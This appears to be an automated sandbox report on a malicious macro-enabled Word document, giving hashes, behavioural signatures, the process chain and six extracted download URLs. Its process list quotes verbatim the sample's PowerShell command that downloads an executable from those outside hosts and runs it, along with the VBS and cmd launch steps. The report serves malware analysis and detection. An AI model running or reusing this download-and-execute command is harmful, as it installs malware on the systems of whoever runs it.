Analysis
- max time kernel: 112s
- max time network: 157s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 03:38
Static task: static1
Behavioral task: behavioral1
  Sample: 13_08_2020_62967988.docm
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 13_08_2020_62967988.docm
  Resource: win10v2004-20220414-en
General
- Target: 13_08_2020_62967988.docm
- Size: 381KB
- MD5: 3d52b1e551984e203f02d9dcbd8e7e8b
- SHA1: 369dbac4370c025651892ce036dbfd82fbbb4ef2
- SHA256: 37a4488c88924394c225a530ace9dc09a4507d913bea46c49ce14ff43b40f6b8
- SHA512: 7ad63084e0c51727866c784b31bf3a77ea68b28b061327b2e8f8e39e6e2834f77aa69a9922294ca362fa5b4b695762e9fa3c28b1bf2584be9611102e21008e53
Malware Config
Extracted
http://podosenengk12.com/rtjyw/555555.png
http://accent-granit.com/urjikh/555555.png
http://wisedata.technology/xhpcvntvdmj/555555.png
http://kahnamoei.com/vatopbv/555555.png
http://carpalette-hachinohe.com/pdfdxenf/555555.png
http://jung-versand.net/dbjqzkp/555555.png
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3032 | 444 | explorer.exe | WINWORD.EXE
- Blocklisted process makes network request (6 IoCs)
  Processes:
    flow | pid | process
    40 | 3980 | powershell.exe
    41 | 3980 | powershell.exe
    43 | 3980 | powershell.exe
    55 | 3980 | powershell.exe
    58 | 3980 | powershell.exe
    59 | 3980 | powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid | process
    3772 | timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Kills process with taskkill (1 IoC)
  Processes:
    pid | process
    3560 | taskkill.exe
- Modifies registry class (1 IoC)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings | explorer.exe
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid | process
    444 | WINWORD.EXE
    444 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid | process
    3980 | powershell.exe
    3980 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3560 | taskkill.exe
    Token: SeDebugPrivilege | 3980 | powershell.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
    pid | process
    444 | WINWORD.EXE
    444 | WINWORD.EXE
    444 | WINWORD.EXE
    444 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description | pid | process | target process
    PID 444 wrote to memory of 3032 | 444 | WINWORD.EXE | explorer.exe
    PID 444 wrote to memory of 3032 | 444 | WINWORD.EXE | explorer.exe
    PID 4312 wrote to memory of 4132 | 4312 | explorer.exe | WScript.exe
    PID 4312 wrote to memory of 4132 | 4312 | explorer.exe | WScript.exe
    PID 4132 wrote to memory of 1564 | 4132 | WScript.exe | cmd.exe
    PID 4132 wrote to memory of 1564 | 4132 | WScript.exe | cmd.exe
    PID 1564 wrote to memory of 3560 | 1564 | cmd.exe | taskkill.exe
    PID 1564 wrote to memory of 3560 | 1564 | cmd.exe | taskkill.exe
    PID 1564 wrote to memory of 3980 | 1564 | cmd.exe | powershell.exe
    PID 1564 wrote to memory of 3980 | 1564 | cmd.exe | powershell.exe
    PID 1564 wrote to memory of 3772 | 1564 | cmd.exe | timeout.exe
    PID 1564 wrote to memory of 3772 | 1564 | cmd.exe | timeout.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\13_08_2020_62967988.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- C:\Windows\explorer.exe (depth 2)
  Command line: explorer.exe C:\ProgramData\Portes.vbs
  - Process spawned unexpected child process
- C:\Windows\explorer.exe (depth 1)
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WScript.exe (depth 2)
  Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\cmd.exe (depth 3)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Nipo_Bik\Jorticks.cmd" "
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\taskkill.exe (depth 4)
  Command line: Taskkill /IM "winword.exe" /F
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
  Command line: POWerShell Foreach($url in @('http://podosenengk12.com/rtjyw/555555.png','http://accent-granit.com/urjikh/555555.png','http://wisedata.technology/xhpcvntvdmj/555555.png','http://kahnamoei.com/vatopbv/555555.png','http://carpalette-hachinohe.com/pdfdxenf/555555.png','http://jung-versand.net/dbjqzkp/555555.png')) { try{$path = 'C:\Nipo_Bik\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\timeout.exe (depth 4)
  Command line: TIMEOUT /T 10
  - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Nipo_Bik\Jorticks.cmd
  Filesize: 5KB
  MD5: a0b5cf22bd560df98fbf461a798ec8b7
  SHA1: e3d2a155cbeeefb366f9f872f1486f4c0016bc29
  SHA256: a1a58a129f0893b4cdf8dec2616e00727a1d247d13fbcf0b9f1ca573a5aa4ccb
  SHA512: f7972aad3d643c243ebabba26fc769ed17c68a0dd2d12b1cfddce80014e857b501b3f27118a3aa06565c5b984a82f65a1a4dfa9333f4020a7b7cea5b9c437947
- C:\ProgramData\Kerpok.vbs
  Filesize: 1008B
  MD5: 75b9911265592c7b70e5cc29bc065b61
  SHA1: 0a54d7d0923e80e37448e31ae9481e860318be6c
  SHA256: 26c6a8e9ae7ce442c94e85ead16f2fa1d733fa0a917a5e40ca03bf1b2973ac50
  SHA512: f2d2096ad1f4a5b9c661130fd66cdac1a4d451889a035cfc89527d8cdd41e6bcc8b83585a80210c61b65e13ee8f2cfa108c3c14cdc36f429b1160d7b4c2050dc
- C:\ProgramData\Portes.vbs
  Filesize: 68KB
  MD5: dc1b5ee521257fc500fefc81e88ccb9d
  SHA1: 42c9a2009e1fcae7de8cb50bd62fb3527b826cf9
  SHA256: 02c28308ba9e17827cabb90d9c92684658c01a52ac90106555e8d46e7fe9f696
  SHA512: 33c4dd9bf6afd01e822cadb08b4dd4bed8a7714ca68f342fdcfca345dfa3eb2fd0b5a4ccef70844d93e76eb7da549995ff98e9969e78b147c383bcbf92c24290
- memory/444-134-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmp (Filesize: 64KB)
- memory/444-130-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmp (Filesize: 64KB)
- memory/444-135-0x00007FFA97440000-0x00007FFA97450000-memory.dmp (Filesize: 64KB)
- memory/444-136-0x00007FFA97440000-0x00007FFA97450000-memory.dmp (Filesize: 64KB)
- memory/444-138-0x00000229F0950000-0x00000229F0954000-memory.dmp (Filesize: 16KB)
- memory/444-133-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmp (Filesize: 64KB)
- memory/444-131-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmp (Filesize: 64KB)
- memory/444-132-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmp (Filesize: 64KB)
- memory/1564-142-0x0000000000000000-mapping.dmp
- memory/3032-137-0x0000000000000000-mapping.dmp
- memory/3560-144-0x0000000000000000-mapping.dmp
- memory/3772-148-0x0000000000000000-mapping.dmp
- memory/3980-145-0x0000000000000000-mapping.dmp
- memory/3980-146-0x00000207ABD00000-0x00000207ABD22000-memory.dmp (Filesize: 136KB)
- memory/3980-147-0x00007FFABA7D0000-0x00007FFABB291000-memory.dmp (Filesize: 10.8MB)
- memory/4132-141-0x0000000000000000-mapping.dmp